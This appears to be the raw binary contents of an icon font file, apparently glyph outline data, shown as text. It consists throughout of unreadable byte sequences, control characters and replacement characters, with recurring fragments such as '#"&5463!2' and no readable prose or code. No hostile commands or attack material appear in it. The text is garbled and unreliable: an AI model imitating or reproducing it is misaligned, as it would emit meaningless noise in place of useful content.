2S^w�7+76;26'&++76;2";2#"&7>;#72+".>;+";2?6+"&?%2#7632+"&576&++"&?3+"&?>;2+76;2?6+"�
 	#%	
�

 (�90#	:	�$�		�IB
	/5!�
	_�%(#4

"c�#!(	@bJ(
����!'#31/#?#7�#���{p�651cb
os��t44<//.=
&J�2����%#"&4632.#"32>XA#_5g��g5_#A
6*>>*&�R#&+�Α+&#R>T>��*�.y���&767676.'&'&76'&'&0&'&0&&'&1.'241676727"#00'671327>7213"767676'&'4.501&'&'&76767632767617'"#7&'0'"'"#.76&'.'&'&'4'.'&7:30236'45"37>'&'6%&'6&74&5&'&5&76767&'&'&'&7671676'&'6'&272637'67'676&'&67&'67.4>56'&'&"#>767&R	"8		
 
�%	"))




�,H+#	
)%
  � 	!0	
			


	
��
"	
	
  
		"
 	|
]
)
;%

$X-.
-			�V


	15+*
!$% 


	
	

!
�




	
	�.:JZ3#5'.546762654&#"'3#5'.546762654.#"%!"3!2654&'2#!"&5463~44-.@
�44
.
-@	D��

�

&&��&&8�	&'	:


��'	:

�
�


 &�&&&������GL767>454'.'37#73'##".5&#".7547;2254'326&�
O
	4"�w�ZJ![!&R
T&6
�@$@&
	3+��7	

#/�

)$J���"'53'3#%#512>'.'&#4>1#53WJ�>>�Bj<3P-7]<`6[v@8S�__"JJ�=�@v[6`<]7-Q2<jBS��_����
%]$#".54>32"2"&4%&'!"&5463!24&/.+.67'"367./17672>7)
s(:=��XI
	
 ,h+.#%(
"S+
!
�

��5390Z��$KO$


	����
2+4546264&"7�\��\�Z5KKjKR�����[���KjKK5!K����#53+32&+325��0`ӽ�__q ��~�T��d
������-159=%#535#5#5'#53#5'#"'.7!27&6?6%#53#53#5'#5^BBB�BZB�BW
C)�vn8�	%+�B�B�BB�;�==�;;H<<<<d	.ciB!Z':
$;;;;;;H<<����/2:I%5!6767>'.#"&76767>357$4&"23676&/&'��YH0!"!H)("M["/��
'sZ&
	#0
162R@]R/"*4	.>>XA76�


�bD!3$4=B����
#)1AI7>77&'6>7&7&504576&'67&&7#!"&5463!24&"2Z(C�2!@�. KE.##DI'-(	2'4/0���`@^�^^��3$,K+%� 	71	�$(4
:".d %0���`���^^�^����32+532654&+#�rE> <_:��V_dQk@�F?[*P@&@a?@`7������
$,����>2&&#&676.2#".54&2"&4'3237.670>636"'&5"5&?"1"&46323&''&676767.'547>3>367.>>2'%6.67>4.'&""232>7&'&7>9
	�
�
		�


	N5j!@
	--H
 b9"
$-	6*"(	��
'
G	3	�(#	H�

l						�h

	


]
	(	
.%			�
O
1				U
.
O����
#2#>%13#67'.5!456WANdE#-�3
TQ `AWGDu�Oq�S�	.%$/	�k"/0ijY_��*�%##5#5354>32#"3KdQQ7$$

(Y���]F(8O<����'B2'&*#"&5<&<.'&54>6&"/&#"?62327i�`�L
N'B\�O
:
I
O
:
��hT{-		Fl3Z?%�
;,t<,����####5353533##5353##5!###�@����Z����@����������@���@@Z��������)<K73##576=4+53546324&#"#576=4/73''7'73733r]M;�	&55*/E

�
!	n
*+
&
&�3�"#
�32.*
 ��"	�	(�9-

-%
&&����Q�72+"=4;2+"=437010101010"01"101"1110101#0**1#*1"#"*#"#0"1*#"#*#0*&*1&#"#*1&#*#&'05&'4.#04'.5.14"5&'014&5&4&4&4&5'"&</0&1&54'4&'45"41&54&<&41&5<&<&504'41'041&5041<545&504145041<'45<547676767676767676320154+"#54+"#54+"#54#563232=4#"#"&#"5654""#54+"#54+"#54+"54667676���.;ed<.*33+
	

(,,(�4444}AOVSOA

��H�1

Z�H	LL	�����	(>.'&7667"&54>32&760m5	%#�01}~�~:c;4/	
	M`5m	#%%1U�
	19YY;c:!4��H�lw�5'.54765&'.546765.547.=46723>54&'&765>54'&76"32642>54&"6�ss�
�b5T1E9
4>N>dd>N>4
&8 iQ@i=
�

�	J15t����t51
-1d�
|h
Dc8Dr 
g>Eo\	
 	��
\pE=g
@S-V�h|JrC0-
�
"	
����"%2#"&54632&"327572&+5DDg]��\[A?&nNN74&%34v�
R�\]�B?'NpN$"q50*Y���� L'.7>327#!"&5463!245#"'.#"7670703'&'4+76,*
,!�!��!!P!v(&4
<4.!#O!C%!
5 *-"O��!!P!!�"�(*$:<, 
 
��c�0?732327676564/.'47>32753.'&"67>'.+

5'*27"3L+	O;2,f%IE�+D"(A"<-0	1'* #'Q;% 7@=���"�EA1QU.8@���%3!!'S�����6Q��!S�Q������������	%'%	&54'77E������<AA���<�ݡ�����
(
"@@���< ��@�*Q74654'.54>54'71"&5>54'#".5470>54/p
O,+!(!�C 	D�
8* >105,9)6
CF-4,	 *
P��~�&-OVd�#0��������67&'6?#64>4'&'.'&'4.77&"&576&'&'.77>2"'&'&637#"'&'.'&6?654&'&'.54746165>'&767674765&'.#'763263&67067>367632"22#66763267&#""67>76%2726767&'&#"&'&#667676;2&'67&76767>54/0&5&'&7676'&'&#"767&'&"'&'&#"45673&?67&'&'"276'&+"767#7>'12'"&/327"'&'&63=.%
		n	
%.? �	

�
(/((/	


#	




	(

	
		��	
1		t

	
& T  &	(=5
	f>v�
	F<)�


1

		+			




+			
4
�

		e
%(--$#
			
			
			

#1	
	+�
30+..+-3


!		!

	
�*+9	0@@<+*�	�

	����
���7#".5/267#"527654&654#"0#"76746767476'&#"47>76'&#"#"7676'0#&327717670767464676767676767"./3276732767>54&#"'&7>7632'.7&54632?64'"=32�%i��

	


+-*		
	

�ttD0
=9
DF9P	P


�	@					!	_P	

	
 �


1@<)���� 2#!"&54637#.'#3����Q#	%P���`�6�-/0"�g����!.'>72&#&'.=4>76&#"#"&#"0+".5&54>16&#"#"&#""3262324'&'.46546;23262�'��')N		n$p$���(&s)�k		1Fe

	::	
eF1			+		+	�����$>&''&'&'&67>./�O:
 # &
o"*>$!	
	THN(_-.R&`J7-#AM<g*:1*!<����6A%'#"&462675&5462#"'"'&46327&542654.#"�
+�
'/?L6,#2"2e9)(�s+_=>I06L2"2",8}()9����5EQ2"&4654""7676547676762+"&=4632>4.#"��ed�e�	r
X	/+<<+�+<<+y4Y33Y4Pqqpe�ee���
�
	
q"	4<+�+<<+�+<�d4XiX4q�q������=%'.7>767>5&540'.7>767676763636~*�
&
 �<,
43&#7Jc<
�	+Sl�����Lcs������� 27PZg������%!&'45.'&>767656.'&'&'.7>74.5&7>7676>367>7>72>5&626.5&6'6&'&'7676'&'.&>.'.'&'&7>36'4&'&6'>7'"76'&'465.'30'&'&'".4173&'"7<5&#>7<5"'&'&7>7&#&'342;&76'4.'.'636>&&>7&721&'&7&72>>7>.'.56'.'.#".7&6&7>7&'.'&'&36�
�Z
. 	
%g��4		k*"	6#-6, 
	
FC�
	
e
"��*)=�	
9$S

	�	#	�
`


$!�%*!
�8/V%	 %!

		
-?	
(|0

	�"^4	F
�$'?^2

	!%
			!)
�
	 
;

/	
	

 
& 	Z
)/
#
		D	'	
			$(
	
���">[.7>3267"1326'6&'&>76767>320676zX/lȯ/6#q?FpG3C		7a�3�	57K�/+&F-)
!�

.�"3	?�6ȯ/l�W8>��
6�>u".)KEP&/ 	
6
	"	!����6!!75##"'3262654&/.54>327&#"#"'��@�*"-"c'
	
!)"
		

"��@c��'  

	" 0
	+����B2#!"&54635##"'3262654&/.54>327&#"#"'����*"-"c'
	
!)"
		

"���`����'  

	" 0
	+���.D\huv?7'&'2#"&546%016"'&7'676'%&767''&>%2#"'&'&'67&54>2.7>3'654&'7@<1N/'	1;C3$)z/	
-?��.'.r?1N/'1;C3)
�	;H^uHQJ "":';B		 +#'�17D5		02J*(}1
,;,&18D5	$'<A+'

i]uI];6Fw$44#!!0����2!"&5463!24.#"326=7>/76&'&���`�

	<
!
1(&, `��.�	*L
?:


@����7>&/#"&54>32�SFK[>p( $'" )NGv 5ks6�L**/%$*	����RV\qw|���"01*#0&1"1'&547450346257622031754506105350>176201310%7?5'1&10&10'1&<15/?'575/?'75�]��a`P`a�xQQP".!/\/"�u;P\T-��."/)QQPXQ"/Ln5iooJ77�.i77b.//��\4���C".511[K\�[[V...�.[������%6Rbx%+"/+"=4;254;2#2+"=432+"&=4;272+32+32+"=437#!"&5463!24&"67>76! R-�.�0"��"/0""/>_�`N;

.9"�G,*G,*GG<G9<GW��"/0""/0�6NN61J,'u	*H3'&5%3".=4&3#'546323#%53'57670&'&=325N,�/''<*%8��M*#&( -Mo�+
'"
M/MM'�+<.#MM�(6F
4�q����	''7'7�@��@� ?__? @�$�\\�%��\�$�77$���@�2:Bt7>3>32"".''&/*.7#"4;2#"4;27&767>54&"&'&'&'.54>32v


		

���(XX
KhK
	+J+B^�. 
A		�  @  �
,1(3HH3(1,	
'
/*G*[@/
��$4/5373#576=##576'H-�m_�'&�'l3�3	2	6��%��%&���	>>	��+�+O#"&54632>'&'&'66&'.732+"+"=4+"=4;2=4;2rnSg��gS�:&.��/
.��7�&"* b1j((0((0���gg���)�;B�^B/	)1-r+&U#* 
n0((0((����3#73#3#73#����������������������!&=4&"&=4.&5�,,*+$ ,,��t������$2"&454&"6754&"6324&"�Α�Α�"!�"�"/��Α������ ��=�����%3#"&'357#&5462#5'`lAR,Bq!lhh��K
�Α
K��@$6A7�iiP')g��g)'�������6G\h%&'7&"&'>='6267&"6267.'&47>330#'236"'&'.4"'6?7*�*h+&$:FF:$'�

,d,

0��>�>,,>VcU?,,�	#:
�$
�4&&J	
�
�-F%$G-�
 -EEEg:T&&U;g�(5{

����;j"/&7676?6=4/&6=4;2#"/&=4?67#"54;23254.'.54632+"'.#"�	>

/���20����0,b#7
",(V0).&<%j�jj�
���kk�k�!D
@
	@@ %%#53%!#5#5#35337#3537#3533533    ����@  ��@@�@    �@@�  � �``�� ��````
=�C)Hw{����7537#54&#"#546253+"&53;26'5#5462#54&#"32653"&%"#"&/73275&'&'&'&'45>32'&53%"&/767&'=>2'275&"5&"2'53#'#53h!4D10E*&5�5L6'' '6&�
		

)
�F" 	D"!)%%�?�41DD1*5&&55&&&&&b


 qDD5
		*


R

Z�^)����7FNV^fnv~������:4>'4>7"&.'."'&5476324&"264&"264&"24&"264&"264&"24&"264&"264&"24&"264&"264&"27&'&"62X
	

#549 B�B (B^^B(��XXX(>�>	O��	

	
!(;��O5005OBB11B�SStSStSStSSD'  (
����	#/9AT"&463235#737'2#547#'35##5##5##54#"35'5'57'#353#"&7'326�g��g���`o)F9{�!8)�E
DEDD$	
8�Α�� �?�.

471M/:HJ0!!�gV

	,��8�
3m%#"'67>454676765&5654&.3276'&#"'4>;>3735467;23232+!".='#"&'�6) �&.^O8		,9

�Vb
	��
	�&:/I^,�5
(<[:4%H
R		K
	�	

�
���
%#"&46323lLLllLLl�Z�Lll�mm�������"5#"&'&546322>54&#"#".672654'6r<R'(F S{VSS=>/mKPn/?@B-$9%%B&�?WSn	+?*mTX~�9Qf(PttP(fQ9,A$5A	;������!,AI%#'#//75'737573724&3>7"'&'&476762564&"C	
				
-
	�^8�8)8? 8�8��Y~ZZ~Y�	 !	
				.0_87*80?!87�YZ~YY	����FMl������7&'.'&'&"#67>3021'.'&70703'.'&167&'&'57>01&'&76"45."&'&74"'50>767>0&'01&"'&167>76'0'27:63231'&'.'&'6160&'&'61�"Q

.		K"#8)'4
		R?(&$

�
�D"%#
F
3�*
%=C"'�"


!	"
	(
	)�!	$%\

	�	h744D	"//%	,
&0		



��#	�
	
		i

�	
������@�(;%57>'&5676'54'&'.7>??;
	͗

e%'E=�^6L;/=�� 		�a

.PLI66	#8
U�
���
<97*l	#/6#	1������(-&'&67%6'76&7'&>7'6/��##i

����a�t	S	jZP
�Q
\-!1(7����	��=	�������%GV%+3'&=46;26=32"32>54'"#"&'&7>;5#54>76#'2>4.#"�	�k5656 k(((�	�%$�k38r		�?.)&&f )0��	�167
)

			f �	
����/2#!"&5463&63265#"265265#"26=&6a'88'��'88'2	8�
��
	�8'��'88''8�	
�
�8	����U2"&46#"#"3232#*#"&7676#*#"&767676&#*#"32327656323276�Α�Α�	|	<	
5

'	
#.[A	��Α��		F5	B?F+E&����!@GQ[#"&=46;2'&#"#'#35>32#"&'365654'&'&'&#"32767&#>33264&#"3264&#"@�5KK5�5KK�	$
	x		S


 #"(3\









 K5�5KK5�5K��Z
F%%"'fx����	%(%'762#"/7/7676/&'&>&5��(BDrB�fE:0
�]$#
0"-��{&�9b6'BsCf�#P%
"
!)%0
@Sk��>F��?�
%Md$2#"&4&2#"&462#"&54>7#"''&5476'&5476'&5476632264&"676?30	
Z		�				�)Rr$$LO	8	33	8	NM#%rR)�`����5+-�					
		
	=)..)$6'
;,5AA5,;
'6��X}XX>6*,8
����2"&4'616/&"37#"�Α�Α�eJ�
"
�ZUTK
p��Α���w(�

�cc)����x#'+/37;?'77'7'7'7'777'?'7'?'/7'77?^6JN�."7Z %#	8	8<+!)#+.|G7-+3=5PCBY".',";##B1 
"
&		/
)�@
H96�`�-2W�B����@D57'.546'0'.'&/?>54&'514"�D66&/$:MO�<)	&,$-5+7(&
,>҃�s|57"';6[<<Z�X,

&1	:%*>4*9 0*
(
<��7!>'#.'6X-~w�x2M
)ps^`	5EE"�9m<Me�>`�L-T?-
Q����
'#"&462264&"��.<Dbb�b �jKLiL�&c�ccF7,LlLLl������MQ%&/&/'"&'&>?''"&'&>?'&>767'&67676767'�-
^
	4-5
-]
-	
.-
�^]�/
/ .

0

Z

/
///
Z
9 Z����77&>&7&'&'"'3>56'.54>32@<
��w	C
!,z��'/)7
/("2 
/8B�w	��<	+)+&$
*!	"&

������=%/&?6?6/&/&?67/&6/&?6,�	�-�]TD:�4-�\_92�+�	�*��"�JRA,�V$�H\7'�*����� 2>"&462##"./567>324&#"'.'3264&#"32�$3##3XC/m1!:aGB/5�$&%�, $- (3##3$>/CO!,
k'e/B5�4%
&&	"�?,#-����A��%'"'<.'.'.01"'&76&*'&'&'&656&7>4645&>'"'.'&0#"'&'46'.'&54'&7>5&"5.6'.767>67>7>7>23>32307>302

			+%
	>59	,

	�N	
		 	'*
	
$$+-


,	$*

!

			����2637??7'7''''/'7'?�'8P
C]8Y9}�R�sf�|�1.�+l&
,ND&@'$J
.3D6
{l&Jc&Tz8a	%��E�a@NZamt����%#"'232654'%.54632&#73254.54632#54#"#"&'73"&=3255#532+53254+5#532+53254+54+532;2=3+"75#532#54+3#;2=3+"7#53##7373#5#'#�ApC#$e�3.5��3.5�e%"
e�<		
	



v$"'

9'9		%?4';� 6J5+#1,"10EJ]

	
		
M777H+HH+?=>
		?


	U������/#?6'&'&67%6�Dg2
��f�]��"L0
i�� �����(2#!"&5463>'."354;2+"=#����pGNhN^DD^���|��W84FF4D8����'575'7''7���X��eW"XVY@����-uKK�:55/7����#'+/39=AEIOSW]cko"'3'#4=3#&'7#&'7#57#57#5#5#57#5#5673'5353'53'3#&'!5353&'!'673'53#4=3�v0��gg�bnfggggggggggggg
ibgggggggg�
%ggg��S
t
tVggg  �
F	
#E�#EhE

#��

%JM�gs��
%	R

"��y�-In'.'&?6?>76367'432'&5676322'&'&#&56/&'&74>76�
�
4
	�5"�

�	%�	�%;
!�&�	7"





���"			���	}�����7#&'&761'''''#'&'7&'7&'7&'7&'7&'7&545'767'67'67'67'67'67'6?27777774&"26"&462654'&5'654'&5654'&5&=#+&'#&'#.'1#.547&+'&54704&5232673275#327.'&�,+-"%
$"-+3378:;	7;	16(."".(61	;8	<:883Jg�hh�OYYY|
)

�
	
					

>k

�" %$'&&&&'
#%"	


,'
84
A?GFHHFG?A
48',!�hh�g�~ZZ~Zy

Z
p@$





!eB����;Q>;2=4632+""&5&54.+"&=4>2;2"'4.5&6327632�	c 	
!"d
e"!
	 c	$11		CC		a3


	

% 	



	 %


��UUvv�����3Zes��#'"'.5'7#.767>;6&'.'*?>72>'"5&'"&636&'"&63&&54&#"432'.'&'&'./&6762?6�!
"J%	
	
$	0d$#4U 
I,-)0)
(D@
�
+(%*//E4:L
?


	

	

�}\&

	4 " m0�Nm([)/)#OO
#f 8!,4&	;C
K�"


		
	
����22#!"&54636'&6'&'&6323276���L2C!	%.B@���f�@N		 *h8
/>4VR��`�,U7"&/.>;2326?>;2#!"&/&;2326?>;2#'2+"./&#"+"&?>3i7!$$!	8

h8!$%!	7

�8
!%%!
8		`pK
K	p
pK
K	p
�pK
K	p
����BRa2#"/7'&546'&'&'&'.'&>76'.'&'"#"07>2#!"&54632654'&"7�m'(N7$2
�			


e���B^0.�]T#E'(56M
0 &7o


	
��`��]A@1.]A+%R����/:�''#/'7''7/5?'77'7?3772>54&"''#/'7''7/5?'77'7?3/3267;?3?'�	

w"/!!`/7'6''
*
$%7&66'5%$*$/>,%:
			B!!/!(
#&4(66'2#&)'$4'4.
:&+>/#����
@J2"&427&/7654'&54632&#"23767/"&63376>54'�Α�ΑE9k�&$DC?P@W&G9<		R0"%<		D3<��Α��gAl$+��
��	G�J6 #;-�_		��f=92%+����+AQ%'&'.547>''&'&'&7>7>576'&'67632%'76"&'".rG;14;3
Y6T�Z!	69

`+#��	?y2
1)�W $	!/_0R�mU-	2G)" 		1A<"Rx(
@�
	


����7#7&546;#5#";�W@`KU@R7&2X���&gMT��8;m��.�533�p8R^4y@�*������<�D/;C\gy'&7670#1#"&#"#'.7672326732+#73264&#"&54?54#"#4>32#5#'26="#532?'3373u

nI%*#�6&
"n3$#5	"!
9#$B�M%�&
a
	J	�ss���@�'DPj|+534?#"7#!"&5463!276'&5&7&'&#"&#3262327674&+3532>4.#"363232737##'##"#3267.M�� ��@
	
	
>




�3
Z
&			f$77Z

��`�

W	(	B�/
	cQQc��l�'.871#"&767672#&'.'&763276&'6�" �

_3+3U*'(%+}"
�
3>Acf5</x1.BAa-��F29H7.^
J'Gyd����;`ko������"$'"/&7672?6=4/&6=4;2#"/&=4?67#"54;23254'&5432+"5&#"7#"&4624"7#&54+#5322&4+3%/&=4/&"&=4?6;2%/&=4?6=4641'"#"357057&=4/&/&=4?6721200#'"=0/&=4?6'3'<::9:::+
7	��%$=>O===%.�$>%===Q�=>==KL!B!!B	BB	B!!B!B	)
�_,		,_$$d�$$G#	^�

##G$$*##F$$6����-W7>76'&'&767654&'&'&'.4&707676'&7>7676'.zZf�VR
%&-
X+C;0-@(7!5
�cRr�c�
v`Y�!
FE')#+

FF"U


8b:;8 0
-;:.IX[x
}���<JRZqy���������&'&''.767&'.546767&'&67667>'676&'&&'&'67673276767&'&'&"67&'767&''6&'6767&1.67&'67&'&'76767#"'6'&'767>54&'&'2&"&462�*47-
;!!?	+52*			@"!;
!"

0�
'	



.
�		
_�"!4%


#*'z""
2
�!##	',#

}&&),0$>*		,*	*?C-R'6�
�JF
A

aN3$
��"! 
d	$10." 

!! &&����
#'##73'#'%'7>�MxNyT)A���<�
�� QQ���	88	7�I)P����%+5352>54&5475&54654&+532#"'73254'&'&54>32&#"23#"=#";#"&54654#5654&546;7#"'73254'&'&54>32&#"'2#327#".5&634#"ej+"*	
	��
+

K�+	!*	
	� #_##-9�
!			!
  
"	!*"	

<"6�	
"	 
"
!		"�
;"	

D+!#
&%.B��������%72'47>&'&'&767&'&''&7676767&'&'5#"&?#"'.7671'.7676727.'&67676'.'&767>'.24767>2630>201276705076767>563206767632266'0"676'&2>65417654'.�)1%#


	

	
	<
M	-# !9^Bw
;/%H
-HWhK"1:!
'
$�r 	
"�p[
	EW,
$


 	"

( 

		%
>%$& )75"*)V	Z""#'+		

V

	
	:
		
	
�"-&j3
2

��337#'e[��08ਨ6rr����YY �� ������?''373�&&&� �� R��0n�\\�J��bb��$��BB	X�(	0D��7'##7'3'373537#5#53".46767624.'&"27>"&5475"4753#5##5353#5##535&/3#5##535'"475'"&5475'&5&5'43>?##7#'#077'373'k4>>>']>--�)d�


			
				
	W


P

&	&
	P

Y�AA?>@@�Y��**��c+<�``���ttt%

		%D		
)��)
Q((+��y�y���%'.'5#.='./&/'.?#+'&6?#'.5'"&'&'&'&4?673676720326?>7>;67>2?>026?67>?6766>?4567>72>?>7>3>?>6?67>'&%>'&>./.677>/&�
			:	

		
	
0


	
	

��

	

d
	�
:	
	


 


		
 "
6	
	$-5:/


-=(	%1%

m7
,�
	"
	����.%#"&#"##"&5&54622>3232632�
7%H2B"/"
%P
C	YNw"" ��p�7#3#3#3#5B22e3�3�2~BL�L��L���
L�)	?G���7573'7$"&546253#57'+'.45454>;654"2'#''.4547&'632&'54#"'&'#5.6?>767>36'7&54"2�&&)6�::�:Y
 	 k
 	#A
!	
:2)@&
 �.�`

x

�nn��w		Z((
T	 6^1J
	

'9((
��y�#'#!3'3��Y>>Y.CoqD-���tt��X	<�D>RYhsw3#267#"&=6&#5375#"'53254.54632&#"#327#".5463234&#"'2#"'5362654&#"53�""	
�
,&_,��!SW  %"X.
	
q$#,'	r,/&&?	
"�*	)g�;$
$^	(
*+		!$#..3+%((2
�{B	!����v�!#"'53254.54632&#"�!090 l\QKTH7 090 iXLBDJ1%;(KO �.#8%KV�$����#327#".547>772#".546�)3&R$Y;	
:F${�%
%rYW@<O~�44'X8,=Er,Yo���97632367676"+"#&#&'&'&'4'231'&'1#"#&50=46;230>76700137654'&'&723230#"#"'4'"'&'&767621450454&'&5<547676362<=4#"&'"#"76760"&747676'4'&'&""#"1"541456767632'00?465632132'"'&5<:232767>76'&'&5&3232=B  ((TO+9%&)'QA�

		"
+!	�
	,	
#	

		


�##$
	{
!	:I�
)**
(
j		



�

	
"	udZY
	
IH5��@�(8r��770=476'"'&.7676232#%#!"&5463!2#0&#"376767674#0"1"45.'&'&#"#"6761323250=4'&'&'"&+"176760"1&'&'323254=01767656'&'"'+01054&5&+"&'&'&'&'&230;21676767676&7&'&'&32376213676767674}�	"� ��$
		'~%
	
�				�AH((926D # /$.

�$#


���`,	Y2eT
<j	Y	T�<
�	
0

��8�%'7'8�������]]��\������2#!"&546337#53'#35�##��##�Qo>BvX�`�#��##G#W��tt��r����2#!"&54635#35#75#75#�	

	�l	

	�(�xxxxx�
	�l	

	�	
����((P((P((����27%#!"&5463!24'&'.+";2767>5�__��`*GrGr�66�`�;
,<,����!!5!3535��@f��YZ��@
Y��YZ�x/[nz�+"=4;2+"&=6/"+"54;2632##"'&=463276/&'&76322'&"'2#"'+"=4>2654.#"&2"&4�))`

))$�	$!5 &!+:�.?@-!)# $$$�"��
#�	{�Q�#"

-

i?[?Y�+	�%%3%��i.?f{�"264%2".54>6<.*#:>732"#73262#67>'.*##%64.*#:>732""#��������W�VV���V);GR:
x!G 

	�%			
%
%�x!G 	

	X[z[[zk-M\M--M.,$ �	Ge�6,�-	"`?	Gd�6,����(#"#"&462&'6.#"3762#"&4:
"#e��ˏ	*?"B]]B%R:.):

�ˏ�f3."A0]�]�:)-:R��@�!-9EQ]i+""'.+"&=46;2>354+";2=4+";2=4+";254+";2=4+";2=4+";2ZI>=2Z�$88$���������������#(�.##.��@@v@@����'=Ohv��%'&767>;0?'.67>'07>&'&766'&'"6766'&'&7672"67>/07'&76>?'&'67'&767Of9(
)%)RM
`	0%
Rw %	=eC
!/0'G�22+!)�.�46EF$�&�S4(�
	YK$	
B�	
	

(27@"�

 

G2��##
<	
-

	Z
�	
	����G1&7>01'&".54327>3270>7>�"$
&',5+:3'<#5	)bBU!1&A5f7
"2�B
	7 	`	fX1!"4(���� -%##5#546;2'42"72#"&546"32>54&;M
ffEE#i��df��jVuwT4]:v�fxxf
9##"��hk��ge�-zQSx2^;Uv����)B2#"&54632>7'#5"'774'&7">753&654'&�i��df��VxS/"]')""=j@_$" #	0-;;��ik��fe��$Sw)&&"
�]+''"
9V:<����13M2#"&5462>741'#327#"&'#53<5#53'7#7654&#"67632&#"3�i�0>J&f��j!<%"
�[8
%-GAxCN�vUl>Q&:"!F��i+N<,�fe��=#82.50		#Sx�<Uv]$	*0
	
����!%:2#"&54627'##5#535'#53'7'7654&#"'3733�i��df��jlDR@=@@:	x�7@evU :*QB(+B?&��hk��fe��=c$$88''8 Sx�3-Uv$3V
`t���� 2#"&546"32>54&#5#5�i��df��jVuwT4]:v	�����hk��ge�-zQSx2^;Uv�++P**����#72"&42>7&'327#".547'703654&#"632&�Α�Α�%E5�$!.&'O3X�wS4YJ!D. (0
��Α���/` ,4##0`L0�Sw2*!4)����(4;2#"&5462>54&#"2+5254.+'2+#526&+�i��df��j4]:vUVuw�FF56"	^2
"?
��hk��ge��=2^;UvzQSx��l'Ol.,�C)����,37;2#"&546"32>54&#".''574575#5'?'5�i��df��jVuwT4]:vM :D	@?;C�qq(%'Y-��hk��ge�-zQSx2^;Uv�F
@F>>f,.-/:5++����<2#"&546"32>54&>32#".'332654.#"3'�i��df��jVuwT4]:v�$#5<*+'>4$
211��hk��ge�-zQSx2^;Uv�*++!;(.$.(+",11����s2#"&546"32>54&2742763276;#&/#"'4'#"'4'"5'#"'0&5'#"/+53767463274>276�i��df��jVuwT4]:vQ	
:3	
				
4-
��hk��ge�-zQSx2^;Uv5l<

P@
	a
,	 \

LH		W_WT

Y9		LbE\Pb
����_s2#"&546"32>54&3#&/"/"5'"/"/"/+53767627427627>7427624+54"#";2=�i��df��jVuwT4]:v;33+F��hk��ge�-zQSx2^;Uv�,S@:HQIFN+
I	Z

9PCT^-
E3
]	����4<@2#"&546"32>54&2+"&=#".=4732354735##3�i��df��jVuwT4]:v�6��)7l�ll��hk��ge�-zQSx2^;Uv��6�6se(C�����(192#"&546"32>54&2".4>"76'&3254�i��df��jVuwT4]:vr:*		*:*		G,6%=	
,��hk��ge�-zQSx2^;Uv<+/6/++/6/+Yd
	.i
Y?�A9AMaf3#7'#&5#"&547#"'#6=3632672354#"#632'3264&"75"326%673#"&54632'.^"c$=) ('  &.
C)!"C0%7��--�/�d)+!*)*)$+"--�6t
B		
�P($	!!+m00)!$*&&����Pb��$2"&47'.7654'"1'&7'&'54>767'.?4763226?6'67'&3&545'7654/&#"32?32?322"&46

�$

.<�,.


	
(

	7�
�R"#	e	
�5:0'

&,!K<
!"70$

]

%�`

t����4`'2>73'.45454>?62<.'&'.3547635476�
A)fM
316

.�/KDD/.
H2,
%-7..�-

 4r
??$r��E�2EK%#'#5.5463253:654&#"22>54.*#27&#EXCp(!%cf��xO�N�-E8�
		
Ft`[��
	
	
�R9rK	>>lGQr4ZC'A�
%#HBCN]�����<_i!!%5"'&'>54&#"'22#23235".4=372><1#3#"=463274.#""'5632��@
<		$


d

%��@r!m.*
�
	
 -E#���#Zf7'&'&7>'&'47>76327'&5<5&'&"#&=76767676'&76760'.67276�3$#�(f42,E%? 	d(\N;	,:�m	�4!Q!e"(
!!%$,y.	"s7%G.
+'
1+1,i*4
�
 *%����c2"&4264&"2"&4264&"%'''"'7&'7&'7&'7&47'67'67'67'627777'�Α�Α�ƍ�ƍ��������||�|�J=7$

$6>JMRSNJ=7$

$7=J
NSR��Α����ƍ��?�������|�||�'$7=JNSSNJ>7$

$6>JMRRMJ>6#

��'�'?/?557`$##T))33d#$$T33),,+y�--��::"++,��::��-����CIOU[ag"&462"264'&/'6373#'#5&''7&'#5367'76?#&'%#63&%3'6&'756_Α�Α�������8-%.8.%-D 
;;	RR	;;
 
;;	RR	;;�"��"�"��%.8-�-8.8�Α��N�����r""+R	;;

;;	RR;;
 
;;	4-8.%%.8p.%-88-%L""���2Js{���3&=4'&'&">7#&#6726&'676&'676727""'&'.232.#"'.#"&'5>326="264&2"&46"2642327367632&#"'5.'"&'6�
&
	

O

	
&)=!(&?
:(!1	&(:
?&(!=""7,�

* *

�xP5[=
y!')

)&@@L""
3


++
����r%>7#./.>?.>?677'7'=57&'>&'>&'>4'�

#,F**E-"

	
&

		"????,

	J	(
&#+!''!

'5,* 5)#		0[>060+
!<-'D$0		7..��.7		0 U*1P-1-713D#
&'544J����{����&76567<'45&'&54545&567>767>&#0'&5&'&7674'&'&'&676567>75'&'&/7<5/.454'&'"'&'&?'&'&'414767676367654'45&5&'&'&'&'&'&'&'&/5'7>32674&'&762763676?32?#"367>7676767674676761#"7&54'&54'&5476'.'4'4'&54'&43607&'.66'&'67&�	

	

			I	W	D)!
I&�+%&#%@	
		
		8	'				


	
	
	&-
 	%		
9,:L�8'', %%	�������^^��K2322230##"'"'*&#&#&'&'&'&'&'&'&'&'4&54&45&547<65<656167>567676767672636212":372676767676767676767676'4&1&'&'&'&'&'"#'&67"#"'&'&'&'&#4.5&'&'&7676767"'041465<5<5<5456767676767654'&'&'&'0&673676745<5<5<645<5<5<5454512174767676763632367676?0'&'&'&'3"#"'&'.'&'676767'&'&'&'&'.'2303232763667676767464567<5<545<54'&'&'&'&'"'47676767610#4&'<'"#*#"#"#41>12676345"'.#4&#41:3670254>721633230"""02220#*#"#"14=46123#"'&'&'&'&'&'&'.50'&'67<7676%0#&'"/476767676767676367676747654'&�


(+		
5
+


+	
	
	
(!		
'/
u

		
	�	

	f
	
	


 "
		

	&

		
�			
	t
		





�	'		
2#

,A
&


-<

	
#			2



	



	
	
	



	

:
$�%	
	


	

		
		

	
&&,


 

	

	

���gm66&67676327676765&'7>767677676'4&4567654'&'&'&'5>6767`I\*,(!B.%$6!#	*/1!-
"0!(M;�7< 3	�93
-!" 



 '%!
-*6	$#.($/<4-I#"%>,14^0
����"*2'62777''''777&547'6"264&2"&4w[

[wF;FF;Fw[[wF;FF;�gHIfI�H44H4�F;FF;Fw[[wF;FF;Fw[



[HgIIf%4H44H
����+5?IS[iq��2"&4264&"%#3##5#'353#535##3353'7'7'7''7'7'7'7'7'7'7'7'&2"&4#535##3353'"353&2654'#3##5#'?'7'7'�Α�Α�Š�Š��TT0v%��IS���|S�	
�		
x켅���BT�Ɲ(u4T_Fp��?��}1�TT@s,	�
��Α����Š�¿#/��.R\8P��]		


�
R	������!3R2���RARA�U}XM<3?��8 XF	���������������''.'4.'6'777''4&467&7467>'.'.67'77'??'?67.67'''''776'7.'5'7'677&'67'677&'6'4&''&'47'67&'6	
		''
